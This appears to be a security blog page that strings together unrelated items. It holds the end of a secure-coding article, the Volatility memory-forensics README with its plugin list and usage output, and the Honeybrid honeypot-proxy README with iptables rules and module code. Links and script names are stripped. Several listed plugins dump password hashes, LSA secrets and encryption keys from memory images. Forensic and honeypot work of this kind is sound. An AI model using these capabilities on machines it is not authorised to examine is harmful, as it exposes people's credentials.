  • Privileges have to be reduced as soon as the program starts and should only be increased very briefly and only when absolutely necessary;
  • The “depth of security” is essential: every protective measure a program takes helps reduce the number of people who can compromise it.

The next article will talk about memory, its organization, and function calls before moving on to buffer overflows. We will also see how to build a shellcode.

Volatility Framework – Volatile memory extraction utility framework

The Volatility Framework is a completely open collection of tools,
implemented in Python under the GNU General Public License, for the
extraction of digital artifacts from volatile memory (RAM) samples.
The extraction techniques are performed completely independent of the
system being investigated but offer visibility into the runtime state
of the system. The framework is intended to introduce people to the
techniques and complexities associated with extracting digital artifacts
from volatile memory samples and provide a platform for further work into
this exciting area of research.

The Volatility distribution is available from:!releases/component_71401

Volatility should run on any platform that supports Python.

Volatility supports investigations of the following memory images:

Windows:
* 32-bit Windows XP Service Pack 2 and 3
* 32-bit Windows 2003 Server Service Pack 0, 1, 2
* 32-bit Windows Vista Service Pack 0, 1, 2
* 32-bit Windows 2008 Server Service Pack 1, 2 (there is no SP0)
* 32-bit Windows 7 Service Pack 0, 1
* 32-bit Windows 8 and 8.1
* 64-bit Windows XP Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows 2003 Server Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows Vista Service Pack 0, 1, 2
* 64-bit Windows 2008 Server Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows 2008 R2 Server Service Pack 0 and 1
* 64-bit Windows 7 Service Pack 0 and 1
* 64-bit Windows 8 and 8.1 
* 64-bit Windows Server 2012 and 2012 R2 

Linux:
* 32-bit Linux kernels 2.6.11 to 3.5
* 64-bit Linux kernels 2.6.11 to 3.5
* OpenSuSE, Ubuntu, Debian, CentOS, Fedora, Mandriva, etc

Mac OSX:
* 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn't supported)
* 32-bit 10.6.x Snow Leopard
* 64-bit 10.6.x Snow Leopard
* 32-bit 10.7.x Lion
* 64-bit 10.7.x Lion
* 64-bit 10.8.x Mountain Lion (there is no 32-bit version)
* 64-bit 10.9.x Mavericks (there is no 32-bit version)

Volatility does not provide memory sample acquisition
capabilities. For acquisition, there are both free and commercial
solutions available. If you would like suggestions about suitable 
acquisition solutions, please contact us at:

volatility (at) volatilityfoundation (dot) org

Volatility supports a variety of sample file formats and the
ability to convert between these formats:

  - Raw linear sample (dd)
  - Hibernation file
  - Crash dump file
  - VirtualBox ELF64 core dump
  - VMware saved state and snapshot files
  - EWF format (E01) 
  - LiME (Linux Memory Extractor) format
  - Mach-o file format 
  - QEMU virtual machine dumps
  - Firewire 
  - HPAK (FDPro)

For a more detailed list of capabilities, see the following:

Example Data

If you want to give Volatility a try, you can download exemplar
memory images from the following url:

Mailing Lists

Mailing lists to support the users and developers of Volatility
can be found at the following address:

For information or requests, contact:

Volatility Foundation

Email: volatility (at) volatilityfoundation (dot) org

IRC: #volatility on freenode

Twitter: @volatility 

Requirements

- Python 2.6 or later, but not 3.0.

Some plugins may have other requirements which can be found at:

Quick Start
1. Unpack the latest version of Volatility from
2. To see available options, run "python -h" or "python --info"


$ python --info
Volatility Foundation Volatility Framework 2.4
Usage: Volatility - A memory forensics analysis platform.

Profiles
VistaSP0x64                - A Profile for Windows Vista SP0 x64
VistaSP0x86                - A Profile for Windows Vista SP0 x86
VistaSP1x64                - A Profile for Windows Vista SP1 x64
VistaSP1x86                - A Profile for Windows Vista SP1 x86
VistaSP2x64                - A Profile for Windows Vista SP2 x64
VistaSP2x86                - A Profile for Windows Vista SP2 x86
Win2003SP0x86              - A Profile for Windows 2003 SP0 x86
Win2003SP1x64              - A Profile for Windows 2003 SP1 x64
Win2003SP1x86              - A Profile for Windows 2003 SP1 x86
Win2003SP2x64              - A Profile for Windows 2003 SP2 x64
Win2003SP2x86              - A Profile for Windows 2003 SP2 x86
Win2008R2SP0x64            - A Profile for Windows 2008 R2 SP0 x64
Win2008R2SP1x64            - A Profile for Windows 2008 R2 SP1 x64
Win2008SP1x64              - A Profile for Windows 2008 SP1 x64
Win2008SP1x86              - A Profile for Windows 2008 SP1 x86
Win2008SP2x64              - A Profile for Windows 2008 SP2 x64
Win2008SP2x86              - A Profile for Windows 2008 SP2 x86
Win2012R2x64               - A Profile for Windows Server 2012 R2 x64
Win2012x64                 - A Profile for Windows Server 2012 x64
Win7SP0x64                 - A Profile for Windows 7 SP0 x64
Win7SP0x86                 - A Profile for Windows 7 SP0 x86
Win7SP1x64                 - A Profile for Windows 7 SP1 x64
Win7SP1x86                 - A Profile for Windows 7 SP1 x86
Win8SP0x64                 - A Profile for Windows 8 x64
Win8SP0x86                 - A Profile for Windows 8 x86
Win8SP1x64                 - A Profile for Windows 8.1 x64
Win8SP1x86                 - A Profile for Windows 8.1 x86
WinXPSP1x64                - A Profile for Windows XP SP1 x64
WinXPSP2x64                - A Profile for Windows XP SP2 x64
WinXPSP2x86                - A Profile for Windows XP SP2 x86
WinXPSP3x86                - A Profile for Windows XP SP3 x86

Address Spaces
AMD64PagedMemory              - Standard AMD 64-bit address space.
ArmAddressSpace               - No docs        
FileAddressSpace              - This is a direct file AS.
HPAKAddressSpace              - This AS supports the HPAK format
IA32PagedMemory               - Standard IA-32 paging address space.
IA32PagedMemoryPae            - This class implements the IA-32 PAE paging address space. It is responsible
LimeAddressSpace              - Address space for Lime
MachOAddressSpace             - Address space for mach-o files to support atc-ny memory reader
OSXPmemELF                    - This AS supports VirtualBox ELF64 coredump format
QemuCoreDumpElf               - This AS supports Qemu ELF32 and ELF64 coredump format
VMWareAddressSpace            - This AS supports VMware snapshot (VMSS) and saved state (VMSS) files
VMWareMetaAddressSpace        - This AS supports the VMEM format with VMSN/VMSS metadata
VirtualBoxCoreDumpElf64       - This AS supports VirtualBox ELF64 coredump format
WindowsCrashDumpSpace32       - This AS supports windows Crash Dump format
WindowsCrashDumpSpace64       - This AS supports windows Crash Dump format
WindowsCrashDumpSpace64BitMap - This AS supports Windows BitMap Crash Dump format
WindowsHiberFileSpace32       - This is a hibernate address space for windows hibernation files.

Plugins
apihooks                   - Detect API hooks in process and kernel memory
atoms                      - Print session and window station atom tables
atomscan                   - Pool scanner for atom tables
auditpol                   - Prints out the Audit Policies from HKLM\SECURITY\Policy\PolAdtEv
bigpools                   - Dump the big page pools using BigPagePoolScanner
bioskbd                    - Reads the keyboard buffer from Real Mode memory
cachedump                  - Dumps cached domain hashes from memory
callbacks                  - Print system-wide notification routines
clipboard                  - Extract the contents of the windows clipboard
cmdline                    - Display process command-line arguments
cmdscan                    - Extract command history by scanning for _COMMAND_HISTORY
connections                - Print list of open connections [Windows XP and 2003 Only]
connscan                   - Pool scanner for tcp connections
consoles                   - Extract command history by scanning for _CONSOLE_INFORMATION
crashinfo                  - Dump crash-dump information
deskscan                   - Poolscaner for tagDESKTOP (desktops)
devicetree                 - Show device tree
dlldump                    - Dump DLLs from a process address space
dlllist                    - Print list of loaded dlls for each process
driverirp                  - Driver IRP hook detection
driverscan                 - Pool scanner for driver objects
dumpcerts                  - Dump RSA private and public SSL keys
dumpfiles                  - Extract memory mapped and cached files
envars                     - Display process environment variables
eventhooks                 - Print details on windows event hooks
evtlogs                    - Extract Windows Event Logs (XP/2003 only)
filescan                   - Pool scanner for file objects
gahti                      - Dump the USER handle type information
gditimers                  - Print installed GDI timers and callbacks
gdt                        - Display Global Descriptor Table
getservicesids             - Get the names of services in the Registry and return Calculated SID
getsids                    - Print the SIDs owning each process
handles                    - Print list of open handles for each process
hashdump                   - Dumps passwords hashes (LM/NTLM) from memory
hibinfo                    - Dump hibernation file information
hivedump                   - Prints out a hive
hivelist                   - Print list of registry hives.
hivescan                   - Pool scanner for registry hives
hpakextract                - Extract physical memory from an HPAK file
hpakinfo                   - Info on an HPAK file
idt                        - Display Interrupt Descriptor Table
iehistory                  - Reconstruct Internet Explorer cache / history
imagecopy                  - Copies a physical address space out as a raw DD image
imageinfo                  - Identify information for the image
impscan                    - Scan for calls to imported functions
joblinks                   - Print process job link information
kdbgscan                   - Search for and dump potential KDBG values
kpcrscan                   - Search for and dump potential KPCR values
ldrmodules                 - Detect unlinked DLLs
limeinfo                   - Dump Lime file format information
linux_apihooks             - Checks for userland apihooks
linux_arp                  - Print the ARP table
linux_banner               - Prints the Linux banner information
linux_bash                 - Recover bash history from bash process memory
linux_bash_env             - Recover bash's environment variables
linux_bash_hash            - Recover bash hash table from bash process memory
linux_check_afinfo         - Verifies the operation function pointers of network protocols
linux_check_creds          - Checks if any processes are sharing credential structures
linux_check_evt_arm        - Checks the Exception Vector Table to look for syscall table hooking
linux_check_fop            - Check file operation structures for rootkit modifications
linux_check_idt            - Checks if the IDT has been altered
linux_check_inline_kernel  - Check for inline kernel hooks
linux_check_modules        - Compares module list to sysfs info, if available
linux_check_syscall        - Checks if the system call table has been altered
linux_check_syscall_arm    - Checks if the system call table has been altered
linux_check_tty            - Checks tty devices for hooks
linux_cpuinfo              - Prints info about each active processor
linux_dentry_cache         - Gather files from the dentry cache
linux_dmesg                - Gather dmesg buffer
linux_dump_map             - Writes selected memory mappings to disk
linux_elfs                 - Find ELF binaries in process mappings
linux_enumerate_files      - Lists files referenced by the filesystem cache
linux_find_file            - Lists and recovers files from memory
linux_hidden_modules       - Carves memory to find hidden kernel modules
linux_ifconfig             - Gathers active interfaces
linux_info_regs            - It's like 'info registers' in GDB. It prints out all the
linux_iomem                - Provides output similar to /proc/iomem
linux_kernel_opened_files  - Lists files that are opened from within the kernel
linux_keyboard_notifiers   - Parses the keyboard notifier call chain
linux_ldrmodules           - Compares the output of proc maps with the list of libraries from libdl
linux_library_list         - Lists libraries loaded into a process
linux_librarydump          - Dumps shared libraries in process memory to disk
linux_list_raw             - List applications with promiscuous sockets
linux_lsmod                - Gather loaded kernel modules
linux_lsof                 - Lists open files
linux_malfind              - Looks for suspicious process mappings
linux_memmap               - Dumps the memory map for linux tasks
linux_moddump              - Extract loaded kernel modules
linux_mount                - Gather mounted fs/devices
linux_mount_cache          - Gather mounted fs/devices from kmem_cache
linux_netfilter            - Lists Netfilter hooks
linux_netstat              - Lists open sockets
linux_pidhashtable         - Enumerates processes through the PID hash table
linux_pkt_queues           - Writes per-process packet queues out to disk
linux_plthook              - Scan ELF binaries' PLT for hooks to non-NEEDED images
linux_proc_maps            - Gathers process maps for linux
linux_proc_maps_rb         - Gathers process maps for linux through the mappings red-black tree
linux_procdump             - Dumps a process's executable image to disk
linux_process_hollow       - Checks for signs of process hollowing
linux_psaux                - Gathers processes along with full command line and start time
linux_psenv                - Gathers processes along with their environment
linux_pslist               - Gather active tasks by walking the task_struct->task list
linux_pslist_cache         - Gather tasks from the kmem_cache
linux_pstree               - Shows the parent/child relationship between processes
linux_psxview              - Find hidden processes with various process listings
linux_recover_filesystem   - Recovers the entire cached file system from memory
linux_route_cache          - Recovers the routing cache from memory
linux_sk_buff_cache        - Recovers packets from the sk_buff kmem_cache
linux_slabinfo             - Mimics /proc/slabinfo on a running machine
linux_strings              - Match physical offsets to virtual addresses (may take a while, VERY verbose)
linux_threads              - Prints threads of processes
linux_tmpfs                - Recovers tmpfs filesystems from memory
linux_truecrypt_passphrase - Recovers cached Truecrypt passphrases
linux_vma_cache            - Gather VMAs from the vm_area_struct cache
linux_volshell             - Shell in the memory image
linux_yarascan             - A shell in the Linux memory image
lsadump                    - Dump (decrypted) LSA secrets from the registry
mac_adium                  - Lists Adium messages
mac_apihooks               - Checks for API hooks in processes
mac_apihooks_kernel        - Checks to see if system call and kernel functions are hooked
mac_arp                    - Prints the arp table
mac_bash                   - Recover bash history from bash process memory
mac_bash_env               - Recover bash's environment variables
mac_bash_hash              - Recover bash hash table from bash process memory
mac_calendar               - Gets calendar events from
mac_check_mig_table        - Lists entires in the kernel's MIG table
mac_check_syscall_shadow   - Looks for shadow system call tables
mac_check_syscalls         - Checks to see if system call table entries are hooked
mac_check_sysctl           - Checks for unknown sysctl handlers
mac_check_trap_table       - Checks to see if mach trap table entries are hooked
mac_contacts               - Gets contact names from
mac_dead_procs             - Prints terminated/de-allocated processes
mac_dead_sockets           - Prints terminated/de-allocated network sockets
mac_dead_vnodes            - Lists freed vnode structures
mac_dmesg                  - Prints the kernel debug buffer
mac_dump_file              - Dumps a specified file
mac_dump_maps              - Dumps memory ranges of processes
mac_dyld_maps              - Gets memory maps of processes from dyld data structures
mac_find_aslr_shift        - Find the ASLR shift value for 10.8+ images
mac_ifconfig               - Lists network interface information for all devices
mac_ip_filters             - Reports any hooked IP filters
mac_keychaindump           - Recovers possbile keychain keys. Use chainbreaker to open related keychain files
mac_ldrmodules             - Compares the output of proc maps with the list of libraries from libdl
mac_librarydump            - Dumps the executable of a process
mac_list_files             - Lists files in the file cache
mac_list_sessions          - Enumerates sessions
mac_list_zones             - Prints active zones
mac_lsmod                  - Lists loaded kernel modules
mac_lsmod_iokit            - Lists loaded kernel modules through IOkit
mac_lsmod_kext_map         - Lists loaded kernel modules
mac_lsof                   - Lists per-process opened files
mac_machine_info           - Prints machine information about the sample
mac_malfind                - Looks for suspicious process mappings
mac_memdump                - Dump addressable memory pages to a file
mac_moddump                - Writes the specified kernel extension to disk
mac_mount                  - Prints mounted device information
mac_netstat                - Lists active per-process network connections
mac_network_conns          - Lists network connections from kernel network structures
mac_notesapp               - Finds contents of Notes messages
mac_notifiers              - Detects rootkits that add hooks into I/O Kit (e.g. LogKext)
mac_pgrp_hash_table        - Walks the process group hash table
mac_pid_hash_table         - Walks the pid hash table
mac_print_boot_cmdline     - Prints kernel boot arguments
mac_proc_maps              - Gets memory maps of processes
mac_procdump               - Dumps the executable of a process
mac_psaux                  - Prints processes with arguments in user land (**argv)
mac_pslist                 - List Running Processes
mac_pstree                 - Show parent/child relationship of processes
mac_psxview                - Find hidden processes with various process listings
mac_recover_filesystem     - Recover the cached filesystem
mac_route                  - Prints the routing table
mac_socket_filters         - Reports socket filters
mac_strings                - Match physical offsets to virtual addresses (may take a while, VERY verbose)
mac_tasks                  - List Active Tasks
mac_trustedbsd             - Lists malicious trustedbsd policies
mac_version                - Prints the Mac version
mac_volshell               - Shell in the memory image
mac_yarascan               - Scan memory for yara signatures
machoinfo                  - Dump Mach-O file format information
malfind                    - Find hidden and injected code
mbrparser                  - Scans for and parses potential Master Boot Records (MBRs)
memdump                    - Dump the addressable memory for a process
memmap                     - Print the memory map
messagehooks               - List desktop and thread window message hooks
mftparser                  - Scans for and parses potential MFT entries
moddump                    - Dump a kernel driver to an executable file sample
modscan                    - Pool scanner for kernel modules
modules                    - Print list of loaded modules
multiscan                  - Scan for various objects at once
mutantscan                 - Pool scanner for mutex objects
netscan                    - Scan a Vista (or later) image for connections and sockets
notepad                    - List currently displayed notepad text
objtypescan                - Scan for Windows object type objects
patcher                    - Patches memory based on page scans
poolpeek                   - Configurable pool scanner plugin
pooltracker                - Show a summary of pool tag usage
printkey                   - Print a registry key, and its subkeys and values
privs                      - Display process privileges
procdump                   - Dump a process to an executable file sample
pslist                     - Print all running processes by following the EPROCESS lists
psscan                     - Pool scanner for process objects
pstree                     - Print process list as a tree
psxview                    - Find hidden processes with various process listings
raw2dmp                    - Converts a physical memory sample to a windbg crash dump
screenshot                 - Save a pseudo-screenshot based on GDI windows
sessions                   - List details on _MM_SESSION_SPACE (user logon sessions)
shellbags                  - Prints ShellBags info
shimcache                  - Parses the Application Compatibility Shim Cache registry key
sockets                    - Print list of open sockets
sockscan                   - Pool scanner for tcp socket objects
ssdt                       - Display SSDT entries
strings                    - Match physical offsets to virtual addresses (may take a while, VERY verbose)
svcscan                    - Scan for Windows services
symlinkscan                - Pool scanner for symlink objects
thrdscan                   - Pool scanner for thread objects
threads                    - Investigate _ETHREAD and _KTHREADs
timeliner                  - Creates a timeline from various artifacts in memory
timers                     - Print kernel timers and associated module DPCs
truecryptmaster            - Recover TrueCrypt 7.1a Master Keys
truecryptpassphrase        - TrueCrypt Cached Passphrase Finder
truecryptsummary           - TrueCrypt Summary
unloadedmodules            - Print list of unloaded modules
userassist                 - Print userassist registry keys and information
userhandles                - Dump the USER handle tables
vaddump                    - Dumps out the vad sections to a file
vadinfo                    - Dump the VAD info
vadtree                    - Walk the VAD tree and display in tree format
vadwalk                    - Walk the VAD tree
vboxinfo                   - Dump virtualbox information
verinfo                    - Prints out the version information from PE images
vmwareinfo                 - Dump VMware VMSS/VMSN information
volshell                   - Shell in the memory image
windows                    - Print Desktop Windows (verbose details)
wintree                    - Print Z-Order Desktop Windows Tree
wndscan                    - Pool scanner for window stations
yarascan                   - Scan process or kernel memory with Yara signatures

3. To get more information on a Windows memory sample and to make sure Volatility
   supports that sample type, run 'python imageinfo -f <imagename>' or 'python kdbgscan -f <imagename>'

    $ python imageinfo -f WIN-II7VOJTUNGL-20120324-193051.raw 
    Volatility Foundation Volatility Framework 2.4
    Determining profile based on KDBG search...
              Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64 (Instantiated with Win7SP0x64)
                         AS Layer1 : AMD64PagedMemory (Kernel AS)
                         AS Layer2 : FileAddressSpace (/Path/to/WIN-II7VOJTUNGL-20120324-193051.raw)
                          PAE type : PAE
                               DTB : 0x187000L
                              KDBG : 0xf800016460a0
              Number of Processors : 1
         Image Type (Service Pack) : 1
                    KPCR for CPU 0 : 0xfffff80001647d00L
                 KUSER_SHARED_DATA : 0xfffff78000000000L
               Image date and time : 2012-03-24 19:30:53 UTC+0000
         Image local date and time : 2012-03-25 03:30:53 +0800
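
When imageinfo is driven from a script, the suggested profiles usually have to be pulled out of the text output. The following is a minimal Python sketch, assuming the output layout shown above; the helper name suggested_profiles is hypothetical and is not part of Volatility.

```python
import re

def suggested_profiles(imageinfo_output):
    """Return the profile names from the 'Suggested Profile(s)' line, in order."""
    for line in imageinfo_output.splitlines():
        key, sep, value = line.partition(" : ")
        if sep and key.strip() == "Suggested Profile(s)":
            # Drop the trailing "(Instantiated with ...)" note, if present.
            value = re.sub(r"\(.*\)\s*$", "", value)
            return [name.strip() for name in value.split(",") if name.strip()]
    return []

sample = """Determining profile based on KDBG search...
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64 (Instantiated with Win7SP0x64)
                     AS Layer1 : AMD64PagedMemory (Kernel AS)"""
print(suggested_profiles(sample))
```

The first name in the returned list can then be tried as the profile for later plugin runs, falling back to the next one if a plugin produces no sensible output.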

4. Run some other plugins. -f is a required option for all plugins. Some
   also require/accept other options. Run "python <plugin> -h" for
   more information on a particular command.  A Command Reference wiki,
   as well as a Basic Usage guide, is also available on the Google Code site.

Licensing and Copyright

Copyright (C) 2007-2014 Volatility Foundation

All Rights Reserved

Volatility is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

Volatility is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Volatility.  If not, see <>.

Bugs and Support
There is no support provided with Volatility. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

If you think you've found a bug, please report it at:

In order to help us solve your issues as quickly as possible,
please include the following information when filing a bug:

* The version of volatility you're using
* The operating system used to run volatility
* The version of python used to run volatility
* The suspected operating system of the memory image
* The complete command line you used to run volatility

Depending on the operating system of the memory image, you may need to provide
additional information, such as:

For Windows:
* The suspected Service Pack of the memory image

For Linux:
* The suspected kernel version of the memory image

Other options for communication can be found at:

Missing or Truncated Information
Volatility Foundation makes no claims about the validity or correctness of the
output of Volatility. Many factors may contribute to the
incorrectness of output from Volatility including, but not
limited to, malicious modifications to the operating system,
incomplete information due to swapping, and information corruption on
image acquisition. 

Command Reference 
The following url contains a reference of all commands supported by 


Honeybrid – an intelligent network proxy that stands in front of a farm of honeypots

Honeybrid is an intelligent network proxy that stands in front of a farm of honeypots and redirects connections from low interaction to high interaction honeypots.

Welcome to honeybrid.

honeybrid is free software. Please see the file COPYING for details.
For documentation, please see the files in the doc subdirectory.
For building and installation instructions please see the INSTALL file.

This readme file contains the following sections:
 QUICK INSTALL  to dive in right away
 OVERVIEW:      to understand what honeybrid can do
 EXAMPLE:       to illustrate how to deploy honeybrid
 DEPENDENCIES:  to list software and libraries required to build and use honeybrid
 SCRIPT AND CONFIGURATION FILE: to explain starting script and default configuration file
 DOCUMENTATION: where to find documentation for honeybrid
 CONTACT:     who to contact for help or bug report
 DEVELOPMENT:     to explain how to add a new module to honeybrid


QUICK INSTALL

 sudo make install
 sudo mkdir /etc/honeybrid
 sudo mkdir /var/log/honeybrid
 sudo cp honeybrid.conf /etc/honeybrid/
 sudo cp /etc/init.d/

Then edit /etc/honeybrid/honeybrid.conf to suit your needs, and start honeybrid with the command:
 sudo /etc/init.d/ start

You can then bind honeybrid to your network and honeypots IP addresses with the command:
 sudo /etc/init.d/ add <lih_ip> <lih_mac> <hih_ip> <ext_if> <int_if>
 lih_ip  = Low interaction honeypot IP address
 lih_mac = Low interaction honeypot MAC address
 hih_ip  = High interaction honeypot IP
 ext_if  = External interface (where Internet traffic will be received)
 int_if  = Internal interface (where honeynet traffic will be received)


OVERVIEW

Thank you for your interest in honeybrid!
The goals of honeybrid are:
 1) to facilitate the deployment and administration of large honeynets
 2) to combine low and high interaction honeypots to provide a highly scalable honeypot framework.
The second goal is achieved through a redirection mechanism that can transparently change the 
destination of a network session (TCP or UDP). Thus, uninteresting traffic can be handled by a 
front-end of low interaction honeypots or discarded right away, while interesting attacks can be 
forwarded to a back-end of high interaction honeypots for further analysis.

Honeybrid is a program that runs on a gateway between the farm of honeypots and the Internet.
Honeybrid has two main components:
 - a Decision Engine that analyzes incoming packets from the Internet and decides which connections should
   be accepted and potentially redirected, as well as when the redirection should occur,
 - a Redirection Engine that handles the network session to change dynamically and transparently the 
   destination IP.

For more information about how to install and use honeybrid, please refer to the detailed documentation
available in the ./doc folder or online on


EXAMPLE

Netfilter's functions are used to redirect traffic to honeybrid. It is important to correctly add
the queueing rules using iptables for honeybrid to receive the traffic it needs.
For example, in an architecture like:
     __________                ___________                 / Low Int. Honeypot \ 
    /          \              / honeybrid \       ,-----> |       |
    | attacker  |<----------> |eth0   eth1| <-----|        \___________________/
    \__________/              \___________/       |         ___________________
                                                  |        / High Int. Honeypot\
                                                  `-----> |       |

The following rules will queue the traffic from the attacker to the low int. honeypot (honeyd) and from honeyd to the attacker, as well
as from the high interaction honeypot to honeybrid:
 iptables -A FORWARD -p tcp -i eth1 -s <lih_ip> -j QUEUE -m comment --comment 'honeybrid: packets from honeyd (LIH)'
 iptables -A FORWARD -p tcp -i eth0 -d <lih_ip> -j QUEUE -m comment --comment 'honeybrid: packets to honeyd (LIH)'
 iptables -A FORWARD -p tcp -i eth1 -s <hih_ip> -j QUEUE -m comment --comment 'honeybrid: packets from honeypot (HIH)'

Don't forget to activate the routing mode:
 echo 1 > /proc/sys/net/ipv4/ip_forward
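
The three queueing rules follow one pattern, so they can be generated for any pair of honeypots. The following is a minimal Python sketch; the function name honeybrid_queue_rules is hypothetical, and the choice of which address goes into which rule is an assumption inferred from the rule comments, since the listing above does not give concrete addresses.

```python
def honeybrid_queue_rules(lih_ip, hih_ip, ext_if="eth0", int_if="eth1"):
    """Return the three FORWARD rules that queue LIH and HIH traffic for honeybrid."""
    template = ("iptables -A FORWARD -p tcp -i {iface} {flag} {ip} "
                "-j QUEUE -m comment --comment '{note}'")
    return [
        # Replies from the low interaction honeypot arrive on the internal interface.
        template.format(iface=int_if, flag="-s", ip=lih_ip,
                        note="honeybrid: packets from honeyd (LIH)"),
        # Attacker traffic to the low interaction honeypot arrives on the external interface.
        template.format(iface=ext_if, flag="-d", ip=lih_ip,
                        note="honeybrid: packets to honeyd (LIH)"),
        # Replies from the high interaction honeypot arrive on the internal interface.
        template.format(iface=int_if, flag="-s", ip=hih_ip,
                        note="honeybrid: packets from honeypot (HIH)"),
    ]

# 192.0.2.0/24 is reserved for documentation; these addresses are placeholders only.
rules = honeybrid_queue_rules("192.0.2.10", "192.0.2.20")
for rule in rules:
    print(rule)
```

Printing the rules rather than executing them keeps the sketch safe to run on any machine; the output can be reviewed and then pasted into a root shell.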


DEPENDENCIES

Honeybrid depends on the following publicly available packages:
    libnetfilter-conntrack1    (must be >= version 0.0.50-1)
    libglib2.0-0 (must be >= 2.14 to have support for regexp)

For Debian Lenny, running the following command will take care of all the dependencies:
    % sudo apt-get install make binutils gcc libnetfilter-conntrack-dev libnetfilter-conntrack1 libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 pkg-config libc6-dev libglib2.0-0 libglib2.0-dev linux-libc-dev libpcap0.8-dev libpcap0.8 openssl libssl-dev libev-dev libdumpnet-dev


SCRIPT AND CONFIGURATION FILE

   * honeybrid.conf
    honeybrid will not run without a configuration file, given as an argument after the flag "-c".
    It is recommended to edit this file and then copy it to "/etc/honeybrid/honeybrid.conf".
    It includes all parameters for honeybrid as well as the definitions of
    detection modules and honeynet targets.

   * The Start/Stop script
    Should be installed in "/etc/init.d/".
    Also includes "add" and "del" options to automatically add IP addresses
    to the iptables queue.


DOCUMENTATION

Documentation for honeybrid is available:
 - online on
 - in the README and INSTALL files
 - in the folder "doc" is the developer documentation generated using doxygen
 - in the comments of the default configuration files


CONTACT

Send problems, bug reports, questions and comments to


DEVELOPMENT

Adding a new module in five steps -- Example with the module RANDOM:
 1. Create a file: mod_random.c, in which you can put the following functions:
    - int  init_mod_random()     [** this is optional, only if you need some initialization **]
    - void mod_random(struct mod_args args)
    mod_random.c must also have the following includes:
    #include "tables.h"
    #include "modules.h"
    #include "netcode.h"
 2. Modify the Makefile to:
    - add mod_random.c to the target SRC
    - add the target "mod_random.o: log.h tables.h modules.h types.h"
 3. Add the following function declarations in modules.h:
    int init_mod_random();        [** this is optional, only if you need some initialization **]
    void mod_random(struct mod_args args);
 4. Add the following call in the function init_modules() in modules.c:
    init_mod_random();        [** this is optional, only if you need some initialization **]
 5. Add the following condition in the function get_module() in modules.c:
    else if(!strncmp(modname,"random",6))
                return mod_random;

Now that you completed these five steps, your module is defined and hooked to
the system. The last task is to get it to do something! For this you just have
to fill in the function mod_random() with instructions.
The args structure given in argument of mod_random() has two main variables:
 - args.pkt is a struct_pkt where you can extract args.pkt->conn to have
   access to the connection structure
 - args.node has two interesting variables: 
    args.node->arg is the argument configured for this module and this
     connection in the rules of honeybrid
    args.node->result is an integer that must be updated at the end of
     the processing in mod_random(), either with 0 (discard) or 1 (replay)

To illustrate how everything works together, here is the content of mod_random():
  void mod_random(struct mod_args args)
  {
        g_printerr("%s Module called\n", H(args.pkt->conn->id));

        unsigned int value = 0;
        unsigned int proba;
        int selector = 1;
        gchar *param;

        /*! getting the value provided as parameter */
        if (    (param = (char *)g_hash_table_lookup(args.node->arg, "value")) == NULL ) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s Incorrect value parameter: %d\n", H(args.pkt->conn->id), value);
                return;
        } else {
                value = atoi(param);
        }

        if (value < selector) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s Incorrect value parameter: %d\n", H(args.pkt->conn->id), value);
                return;
        }

        /*! deciding based on a probability of 1 out of "value": */
        proba = (int) (((double)value) * (rand() / (RAND_MAX + 1.0)));

        if (proba == selector) {
                /*! We accept this packet */
                args.node->result = 1;
                g_printerr("%s PACKET MATCH RULE for random(%d)\n", H(args.pkt->conn->id), value);
        } else {
                /*! We reject this packet */
                args.node->result = 0;
                g_printerr("%s PACKET DOES NOT MATCH RULE for random(%d)\n", H(args.pkt->conn->id), value);
        }
  }

We can see from the code that mod_random() uses the argument "value". This means that when defining this 
module in the configuration of honeybrid, user should write the value parameter. Here is an example:
 module "myrandom" {
        function = random;
        value = 20;
 }
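
The decision logic of mod_random() can be tried out away from honeybrid. The following is a minimal Python sketch of the same arithmetic, not honeybrid code: random_decision is a hypothetical name, and rng() stands in for rand() / (RAND_MAX + 1.0). It does not reproduce the C unsigned conversion that a negative parameter would go through.

```python
import random

def random_decision(value, rng=random.random, selector=1):
    """Mirror mod_random(): -1 = cannot decide, 1 = accept, 0 = reject."""
    if value < selector:
        return -1
    # rng() returns a float in [0, 1), so proba is an integer in [0, value).
    proba = int(value * rng())
    return 1 if proba == selector else 0

# Rough frequency check with a seeded generator, for value = 20.
gen = random.Random(0)
trials = 100000
accepted = sum(random_decision(20, gen.random) == 1 for _ in range(trials))
print("accept rate for value=20: %.3f" % (accepted / trials))
```

One consequence worth noting: with value = 1 the only possible result of the scaling is 0, which never equals the selector, so under this logic a value of 1 rejects every packet rather than accepting every packet.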

Another interesting parameter that can be defined is "backup". It is used by more complex modules that need
to save results to an external file periodically (and that can load previously recorded results when honeybrid
starts).
Here is an example of a module definition for the "hash" module that uses such backup functionality:
 module "myhash" {
        function = hash;
        backup = /etc/honeybrid/hash.tb;
 }

When using the backup parameter, the following function should be called at the end of the module processing:
 save_backup(backup, backup_file);

Where backup is retrieved through the "backup" parameter (it's a pointer to a GKeyFile), and backup_file is 
a string to give the path and filename of the external file where results should be saved. Here is an excerpt
from the source code of mod_hash.c that shows how to retrieve these two parameters:
        /*! get the backup file for this module */
        if ( NULL ==    (backup = (GKeyFile *)g_hash_table_lookup(args.node->arg, "backup"))) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s mandatory argument 'backup' undefined!\n", H(args.pkt->conn->id));
                return;
        }
        /*! get the backup file path for this module */
        if ( NULL ==    (backup_file = (gchar *)g_hash_table_lookup(args.node->arg, "backup_file"))) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s error, backup file path missing\n", H(args.pkt->conn->id));
                return;
        }


BIOS Based Rootkits


